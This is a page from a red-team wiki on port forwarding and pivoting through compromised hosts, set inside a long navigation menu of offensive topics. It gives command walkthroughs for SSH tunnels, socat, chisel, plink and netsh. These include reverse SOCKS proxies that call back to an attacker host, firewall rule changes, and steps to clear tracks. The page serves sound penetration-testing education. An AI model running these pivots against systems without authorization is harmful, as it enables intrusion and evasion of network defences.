Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Practice
  • SSH tunneling
  • SOCAT
  • CHISEL
  • PLINK
  • Netsh
  • Resources

Was this helpful?

Edit on GitHub
  1. Red-Teaming
  2. Lateral Movement

Port Forwarding

MITRE ATT&CK™ Protocol Tunneling - Technique T1572

Last updated 1 year ago

Was this helpful?

Theory

Port forwarding involves using any compromised host as a Jump Box to pivot to other hosts to which we do not have direct access from our attacking host. We configure the compromised host to listen on a port and relay all packets received on that port to another destination (and vice versa for a remote forward).

There are fore main types of port forwarding:

  • Local port forwarding: Open a local port on the compromised server and redirect incoming traffic to an other port on the same host or to a different host in a remote network.

  • Remote port forwarding: Open a local port on our attacking server and redirect incoming traffic to a port on a remote machine through a compromised intermediary machine (the Jump Box).

  • Dynamic port forwarding (Forward Proxy): tunnel the whole attacker's network traffic (instead of only one port) through the compromised machine opened SOCKS port.

  • Remote dynamic port forwarding (Reverse Proxy): tunnel the whole network traffic from a remote machine through the attacker's machine SOCKS port.

In brief, while in local and dynamic port forwarding, the listening port is bound to the client, in remote port forwarding and remote dynamic port forwarding, the listening port is bound to the server. It should be noted that we prefer to use remote techniques, which will open the port on our attacking machine and have a greater chance of evading network defences.

Practice

SSH tunneling

  • SSH Local Forwarding: Open a local port on the SSH client and redirect incoming traffic from that port to a specific port through the SSH tunnel established with the server.

  • SHH Remote forwarding: Open a remote port on the SSH server and redirect incoming traffic from that port to a specific port through the SSH tunnel established with the server.

  • SSH Dynamic port forwarding (Forward Proxy): The SSH client creates a local SOCKS proxy server port to tunnel the whole attacker's network traffic

  • SSH Reverse dynamic port forwarding (Reverse Proxy): The SSH client creates a remote SOCKS proxy server port on the SSH server to tunnel the whole attacker's network traffic

Microsoft has introduced its native implementation of the OpenSSH server for Windows. So this technique may works with both UNIX and Windows servers/clients.

This example opens a connection to the jump-server.net, and forwards any connection to port 80 on the local machine (attacking machine) to port 80 of intra.example.com.

# -L : Specify a local port forwarding
#      [bind_address]:attacking_host_local_port:destination_ip:destination_local_port
# -f : Backgrounds the shell immediately
# -N : Don't execute any commands
veresk@kali$ ssh -L *:80:intra.example.com:80 user@jump-server.net -fN

On the compromised computer (Jump Box), we can connect back to the attacking machine with a reverse port forward using the following command, this example produce the same result as previously seen with Local Forwarding. Any connection on ATTACKING_IP:8000 will be redirected on intra.example.com:80

PC> ssh -R 8000:intra.example.com:80 tunneluser@ATTACKING_IP -i KEYFILE -o StrictHostKeyChecking=no -fN

Since we'll be making a connection back to our attacking machine, we'll create a user with limited console access for tunneling and assign a dedicated password for tunnel management.

useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser

Ensure to generate SSH keys for the tunnel user, and subsequently, add the generated public key to both the authorized_keys file and the Jump Box.

its possible to create a Dynamic Port Forwarding (Forward proxy) using SSH.

For example, by using the following command on our attacking host, SOCKS port 9090 will be opened on our attacking machine. Traffic sent via this port will be pushed through the SSH tunnel to the Jump Host, then forwarded wherever they are addressed.

# -D : dynamic port forward
# [BIND_IP:BIND_PORT]
v4resk@kali$ ssh -D 127.0.0.1:9090 user@jump-server.net -fN

Once configured, you can use proxychains on your attacking host to run applications through the proxy network connections.

proxychains nmap -sT --top-ports=20 -Pn -n <IP_ACCESSIBLE_FROM_JUMP_BOX>

A little reminder on how to config ProxyChains. In this example, we just have to add the following line to /etc/proxychains.conf:

socks5 127.0.0.1 9090

In newer versions of the SSH client, it is also possible to create a Remote Dynamic Port Forwarding (Reverse Proxy).

This feature is available since OpenSSH 7.6. Despite this, only the OpenSSH client needs to be at version 7.6 or above to make it works.

By using this command on the compromised host (Jump Box), SOCKS port 9090 will be opened on our attacking machine (the SSH server). Traffic sent via this port will be pushed through the SSH tunnel to the Jump Box, then forwarded wherever they are addressed.

PC> ssh -R 9090 tunneluser@ATTACKING_IP -fN -i KEYFILE -o StrictHostKeyChecking=no

Once configured, you can use proxychains on your attacking host to run applications through the proxy network connections.

proxychains nmap -sT --top-ports=20 -Pn -n <IP_ACCESSIBLE_FROM_JUMP_BOX>

A little reminder on how to config ProxyChains. In this example, we just have to add the following line to /etc/proxychains.conf:

socks5 127.0.0.1 9090

SOCAT

Windows version is unlikely to bypass Antivirus software by default, so custom compilation may be required.

Setting up a Local port forward with SOCAT involves opening a listening port on the compromised server and redirecting incoming traffic to a target server.

Using this command on the Jump-Box will open port 33060 on it, and forward any connection from this port to port 3306 on 172.16.0.10.

PC> ./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &

Setting up a reverse port forwarding with SOCAT involves to redirect any local traffic from a port of our attacking server to a port on a remote machine via the compromised machine (Jump Box).

This example will forward any traffic from localhost:8000, on our attacking machine, to 172.16.0.10:80 trough the compromised Jump Box.

First of all, on our attacking machine, we issue the following command:

# Creating a local port relay. 
v4resk@kali$ ./socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

Next, on the compromised machine (Jump Box) we execute this command.

# Create a link between port 8000 on our attacking machine, and port 80 on the intended target
# tcp:ATTACKING_IP:ATTACKING_PORT tcp:TARGET_IP:TARGET_PORT,fork &
PC> ./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &

This method doesn't require opening up a port on the compromised server.

CHISEL

Setting up a Reverse Proxy involves connecting from the compromised server to a listener on the attacking machine. Then, the Chisel client (Jump Box) opens/creates a remote SOCKS proxy server port on the Chisel Server (Attacking Host).

On the attacking host:

v4resk@kali$ ./chisel server -p LISTEN_PORT --reverse &

On the compromised host, after uploading chisel, we use the following command:

www-data@pwned.lab$ ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Once configured, you can use proxychains on your attacking host to run applications through the proxy network connections.

proxychains nmap -sT --top-ports=20 -Pn -n <IP_ACCESSIBLE_FROM_JUMP_BOX>

A little reminder on how to config ProxyChains with Chisel. We just have to add the following line to /etc/proxychains.conf:

socks5 127.0.0.1 1080

Setting up a Forward Proxy involves connecting from the attacking host to a listener on the compromised machine (Jump Box). Then, the Chisel client creates a local SOCKS proxy server port.

On the compromised host, we would use the following command:

www-data@pwned.lab$ ./chisel server -p LISTEN_PORT --socks5

On the attacking host, using the following command, we will open the local PROXY_PORT port on our attacking host.

v4resk@kali$ ./chisel client TARGET_IP:LISTEN_PORT LOCAL_PROXY_PORT:socks

Like with the reverse proxy, you can use proxychains to run applications through the proxy network connection.

Forward proxies are less common than reverse proxies for the same reason as why reverse shells are more prevalent than bind shells. In broad terms, outbound traffic managed by egress firewalls tends to be subjected to less strict controls than inbound connections regulated by ingress firewalls.

A Remote Port Forward is when we connect from the Jump Box to a chisel server listening on the attacking machine, and open a listening port for forwarding on that server.

To do a reverse port forwarding with chisel, we can do as follow:

v4resk@kali$ ./chisel server -p LISTEN_PORT --reverse &

On the compromised host, we would use the following command. It will forward every requests sent to 8889 on the attacking host to the compromised host on localhost:6666

# ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT 
www-data@pwned.lab$ ./chisel client ATTACKING_IP:LISTEN_PORT R:8889:localhost:6666

A Local Port Forward is when we connect from our own attacking machine to a chisel server listening on a compromised target, and open a local listening port for forwarding.

On the compromised target (jump box) we set up a chisel server:

PC> .\chisel server -p LISTEN_PORT

On the attacking host, we would use the following command. It will connect to the compromised host running a chisel server, forwarding our local port 2222 to 172.16.0.10:22 (our intended target).

# LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
v4resk@kali$ ./chisel client JUMP_BOX_IP:LISTEN_PORT 2222:172.16.0.10:22

PLINK

To create a reverse connection, we can execute the following command on our compromised host (Jump Box).

As with SSH Remote Forwarding, any connection on ATTACKING_IP:8000 will be redirected on 172.16.0.10:80.

# -R LOCAL_PORT:TARGET_IP:TARGET_PORT
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 tunneluser@ATTACKING_IP -i KEYFILE -N

Since we'll be making a connection back to our attacking machine, we'll create a user with limited console access for tunneling and assign a dedicated password for tunnel management.

useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser

Ensure to generate SSH keys for the tunneluser, and subsequently, add the generated public key to both the authorized_keys file and the Jump Box.

To generate a Plink usable private key, we can use following bash commands

# Generate SSH keys
ssh-keygen

# Convert the private key for Plink
puttygen private_key -o private_key.ppk

Netsh

On windows, Netsh requires administrative privileges to create a port forward.

We can setup a Local Port Forward using the Netsh commands on the compromised host (Jump Box).

The following command will open the local port 2222 on the Jump Box, and forward any connection from it to 192.168.50.44:22.

# Create the Port Foward
netsh interface portproxy add v4tov4 listenport=2222 connectaddress=192.168.50.44 connectport=22

# Check if created
netsh interface portproxy show all

Then, we ensure that the connections will be allowed on firewall

netsh advfirewall firewall add rule name="PortForwarding 2222" dir=in action=allow protocol=TCP localport=2222
netsh advfirewall firewall add rule name="PortForwarding Out 2222" dir=out action=allow protocol=TCP localport=2222

After we successfully performed our port forwarding, we can clear our tracks like so.

# Remove Firewalls Rules
netsh advfirewall firewall delete rule name="PortForwarding 2222"
netsh advfirewall firewall delete rule name="PortForwarding 22"

# Remove Port Forwar Rule
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.44

Resources

By using a SSH client with an OpenSSH server, it's possible to create both forward (local) and reverse (remote) connections to make , allowing us to forward ports, and/or create proxies.

We can use static binaries of socat to pivot, they are easy to find for both and .

is an awesome tool which can be used to quickly and easily set up a tunnelled proxy or port forward through a compromised system regardless of whether you have SSH access or not. It's written in Golang and can be easily compiled for any system (with static release binaries for Linux and Windows provided). It tunnels connections within the HTTP protocol and uses the SSH protocol within this tunnel to encrypt our data.

is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers; however, it is still a very useful tool.

On windows target, we can perform port forwarding using the the built-in firewall configuration tool (also known as Network Shell).

Linux
Windows
Chisel
Plink.exe
Netsh
SSH tunnels
Protocol Tunneling, Technique T1572 - Enterprise | MITRE ATT&CK®
Logo
SSH Port forwarding
Logo
Example of Network layout in a Classic Port Forwarding Scenario
TryHackMe | WreathTryHackMe
Logo